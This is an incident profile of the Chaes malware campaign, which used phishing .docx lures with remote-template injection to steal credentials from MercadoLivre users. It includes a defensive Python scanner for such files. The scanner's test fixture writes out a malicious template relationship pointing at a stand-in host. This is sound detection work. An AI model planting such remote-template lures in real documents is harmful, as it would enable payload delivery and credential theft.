
Cyber Incident Victim: MercadoLivre

Date:

Nov 2020

Location:

Brazil

Summary

A previously unknown malware strain called Chaes targeted users of Latin America's largest e-commerce platform through phishing campaigns impersonating purchase confirmations. The malicious emails carried .docx attachments that abused Microsoft Word's remote-template feature (template injection) to fetch payloads from attacker-controlled servers, which then established persistence and deployed information-stealing modules. The malware harvested system data, browser credentials, and financial information, specifically targeting the platform's payment pages, and used the Node.js browser-automation library Puppeteer to drive the victim's Chrome session and capture screenshots of sensitive pages. Chaes disguised its modules as legitimate processes, and its reliance on a benign-looking web-scraping library complicated detection. The malware also included a cryptocurrency mining module and showed ongoing development, with later versions refining their targeting of e-commerce transaction pages.


Description

In late 2020, cybersecurity firm Cybereason identified a previously unknown malware strain called Chaes targeting customers of MercadoLivre, Latin America's largest e-commerce platform. The attacks began with phishing emails designed to mimic legitimate purchase confirmation messages from MercadoLivre, including a deceptive "scanned by Avast" footnote to enhance credibility. These emails carried malicious .docx attachments that abused Word's remote-template feature (template injection): the document referenced a template hosted on a remote server, so Word fetched the attacker's payload when the file was opened. The initial payload then contacted attacker-controlled command-and-control (C2) servers and downloaded an .msi file, which in turn deployed additional components, including a .vbs script, uninstall.dll, and engine.bin, that together formed the malware's core engine. Further files (hhc.exe, hha.dll, and chaes1.bin) were installed to assemble Chaes's primary functionality, which included a cryptocurrency mining module. The malware created registry keys to ensure persistence and disguised its modules as legitimate processes to evade detection.
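The template-injection lure described above lives in the .docx package itself, not in a macro: the archive's word/_rels/settings.xml.rels holds an attachedTemplate relationship whose Target is an external URL, and Word fetches that URL on open. The following scanner is an added example written for this page, not code from Cybereason's report or from Chaes; it builds two constructed .docx archives in memory (the hostname template.example.invalid and the file layout are assumptions, not indicators from the campaign) and flags only the one whose attached template is an http(s) URL, while leaving the common benign case of a local file:/// template untouched.

```python
"""Flag .docx files that pull a remote template (the "template injection" initial-access
technique).  The tell is an attachedTemplate relationship in word/_rels/settings.xml.rels
with TargetMode="External" and an http(s) Target.  Locally attached templates also use
TargetMode="External", but with a file:/// URL, so the URL scheme is what matters."""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import List, Optional
from urllib.parse import urlparse

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
SETTINGS_RELS = "word/_rels/settings.xml.rels"


def find_remote_templates(docx_bytes: bytes) -> List[str]:
    """Return every http(s) URL the document would fetch as its attached template."""
    hits: List[str] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if SETTINGS_RELS not in z.namelist():
            return hits                      # no settings relationships at all
        root = ET.fromstring(z.read(SETTINGS_RELS))
        for rel in root.iter(f"{{{REL_NS}}}Relationship"):
            if rel.get("Type") != ATTACHED_TEMPLATE:
                continue                     # hyperlinks, images etc. are irrelevant here
            if rel.get("TargetMode") != "External":
                continue                     # template stored inside the package
            target = rel.get("Target", "")
            if urlparse(target).scheme.lower() in ("http", "https"):
                hits.append(target)          # remote fetch on open: the injection tell
    return hits


def build_docx(settings_rels: Optional[str]) -> bytes:
    """Constructed minimal .docx (just enough package parts for the scanner)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/'
                   'content-types"/>')
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/'
                   'wordprocessingml/2006/main"><w:body/></w:document>')
        z.writestr("word/settings.xml",
                   '<w:settings xmlns:w="http://schemas.openxmlformats.org/'
                   'wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/'
                   'officeDocument/2006/relationships"><w:attachedTemplate r:id="rId1"/>'
                   '</w:settings>')
        if settings_rels is not None:
            z.writestr(SETTINGS_RELS, settings_rels)
    return buf.getvalue()


# Constructed sample relationship parts (hostname is an assumption, not a real IOC).
MALICIOUS_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    f'<Relationships xmlns="{REL_NS}">'
    f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
    'Target="http://template.example.invalid/order.dotm" TargetMode="External"/>'
    '</Relationships>'
)
BENIGN_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    f'<Relationships xmlns="{REL_NS}">'
    f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
    'Target="file:///C:/Users/Public/Templates/Invoice.dotm" TargetMode="External"/>'
    '</Relationships>'
)


def scan_samples() -> dict:
    """Run the scanner over the constructed samples; used by the demo below."""
    return {
        "malicious": find_remote_templates(build_docx(MALICIOUS_RELS)),
        "benign": find_remote_templates(build_docx(BENIGN_RELS)),
        "no_rels": find_remote_templates(build_docx(None)),
    }


if __name__ == "__main__":
    for name, urls in scan_samples().items():
        print(f"{name}: {'REMOTE TEMPLATE ' + ', '.join(urls) if urls else 'clean'}")
```

Because the check reads only the relationship part and never opens the document in Word, it is safe to run on quarantined mail attachments; a match tells you where the next-stage payload was hosted, which is the URL to block and to pivot on in proxy logs.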


Chaes specifically targeted financial and personal data from infected systems, with a focus on MercadoLivre users. It extracted sensitive information from Google Chrome sessions using API hooking and the Node.js browser-automation library Puppeteer, which let it drive the victim's browser against MercadoLivre and its payment service MercadoPago without the user's involvement. The malware harvested login credentials, monitored browsing activity, and captured screenshots of MercadoLivre pages, particularly those related to purchases, sending this data to its C2 servers. Cybereason noted Chaes's evolving nature, with later versions refining their targeting of e-commerce transaction pages. The use of Puppeteer posed detection challenges, because its web-scraping and automation functionality typically appears benign. While the primary campaign impacted Brazilian MercadoLivre customers, Cybereason investigated potential links to attacks against other e-commerce entities and warned that the same techniques pose a broader risk to financial institutions. No mitigation actions by MercadoLivre were detailed in the report.
